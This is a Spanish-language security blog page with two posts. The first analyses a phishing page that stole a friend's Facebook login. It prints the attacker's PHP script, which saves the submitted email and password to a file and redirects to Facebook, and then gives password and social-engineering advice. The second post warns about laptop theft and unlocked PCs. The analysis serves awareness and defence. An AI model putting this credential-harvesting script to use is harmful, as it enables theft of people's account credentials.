Noticias
Loading...
  • Noticias
  • Presentaciones
  • Eventos

Tab 1 Top Area

Tech News

Game Reviews

ULTIMAS PUBLICACIONES

miércoles, 10 de julio de 2013
no image

Un tema Viejo: Pishing

El dia de hoy me encontre con un amigo que me dijo que alguien había accesado a su cuenta de facebook, pero que no creía por que no le habían cambiado el password y el no se lo había pasado a nadie, el caso es que le pregunte que había hecho en la pc, revise su LAN tenia buen cifrado por lo que no vi logs de otras maquinas en su area local que no fueran las del donde pudieran hacer un man in the middle con SSLstrip para sacarle el pasword, el caso que el tipo no tenia ni malware en la maquina pero se había acordado que le llego un mail de "lulu" una nena que le ofrecia fotos, entonces me decidí a revisar el link que le habían enviado.

Ese link no era mas que un pishing que al pobre shore no le daba Ni puta idea que asi le pudiera robar información, el dominio era el siguiente: lulusexosa.zapto.org, con solo verlo me recuerda al cliente de dominios noip.com, y efectivamente era de ahí.

Le habían mandado en esa dirección un índex.php el cual era idéntico al de facebook solamente que le habian cambiado el nombre a las variables de email y pass, el caso que al analizarlo el server que lo alojaba permitia accesar a los archivos en esa carpeta, era un server corriendo en debian con apache y php, ahi me encontre con este código.


<?PHP
$USER = $_POST['email'];
$PASSWORD = $_POST['pass'];
$IP = $_SERVER['REMOTE_ADDR'];
$Correo = 'Correo ="'.$USER.'" ,';
$pwd = 'Password ="'.$PASSWORD.'" ,';
$file = fopen("/var/www/test.txt", "w") or die("can't open file");
fwrite($file,$Correo);
fwrite($file,$pwd);
fclose($file);
header("Location: https://www.facebook.com/");
?>

Un php simple que guardaba el usuario y el password de quien caia en la pagina, y donde alojaba los passwords, oh mi sorpresa estaba el usuario y password de mi gran amigo el cual efectivamente le había dejado a quien sabe quien su información del facebook, para su desgracia el mismo password que utilizo era el que también usa en password.

Le di varias recomendaciones de como manejar sus password, diferentes para otra cuentas que no se repita y sobre todo que no acepte ligas  o archivos de fuentes desconocidas por mas te alborote la hormona alguna mujer con que te enviara fotos o x cosa.

Aprovecho el espacio para que en general tengamos cuidado con estos pequenos detalles, el buen shore se había preocupado por la su cifrado en su WLAN, empleo seguridad en ella, pero olvido el tema de la ingeniería social lo que le comprometió sus cuentas, debemos hacer conciencia  y no aceptar cualquier cosa que nos envíen, debemos tomar precaución por que esta en juego nuestra información y lo mas importante nuestra privacidad.
miércoles, 3 de julio de 2013
Me bajo rapido, no le pasa nada a la lap

Me bajo rapido, no le pasa nada a la lap

Muchas veces nos enfocamos en la seguridad, en el hacer un código que nos ayude a obtener ventaja, busca de vulnerabilidad, seguir el PTES de pentesting, incluso en el troubleshooting, pero siempre olvidamos la mas importante lo físico.

Un dia recuerdo que se nos había caído en el enlace en una empresa y nadie tenia ni puta idea de que había pasado, había muchos administradores de red haciendo troubleshooting, no podían entrar al router, marcaron a donde comparten en el enlace, al ISP, a todo mundo pero olvidaron lo físico, y el problema cual era, que cuando realizaron el re organizamiento de los cables desconectaron el serial del router y bueno ese era el "main Issue", lo que les pudo haber tomado 2 minutos les tomo 4 horas con el sistema caído.

En fin eso mismo pasa en la seguridad, conozco tipo que tienen desde la red hogareña su cifrado decente del router, filtrado de mac, hidden SSID, se conectan a VPN en redes inseguras, hacen todo lo posible para que no les rompan la seguridad de su PC, ah pero que pasa con lo físico, ya hemos escuchado hablar del ataque de David hasselhoff que por cierto me toco realizarle ahora aun tipo del trabajo que no bloqueo el pc.

Como les decía los tipos se protegen del todo, aunque sabemos que nadie puede proteger su seguridad en una red, pc, etc... del 100 por ciento pero si mitigar muchas malas configuración que pueden explotar cualquiera, script kiddies, etc... Entonces ya con todo esto, alguien decide ir a la tienda, o decide ir x lugar y dejar la pc en el carro, al cabo me tardo 4 minutos, es tiempo suficiente para exponer la computadora y que se las roben, así que quien se preocupo por proteger su red, actualizaciones, configuraciones, en cuatro minutos fue despejado de su pc, les dirán que importa he cifrado el disco y no pueden robarme la información, pero de igual manera descuidaron lo físico y tendrá que reponer el equipo ahora imaginemos a los que no tienen password en la pc, es un tema de cuidado es por eso que les comparto lo siguiente para que tengan una idea de como operan los delincuentes sin nociones informáticas en el robo de pc.s portátiles, tables, iphone, ipad, etc....


Así que si se bajan por mas rápido al OXXO siempre bajen con ustedes la pc, no le despeguen la vista ni siquiera en x lado por que en cualquier momento puede ser burlada la seguridad física.
Copyright © 2014 OSI SECURITE All Right Reserved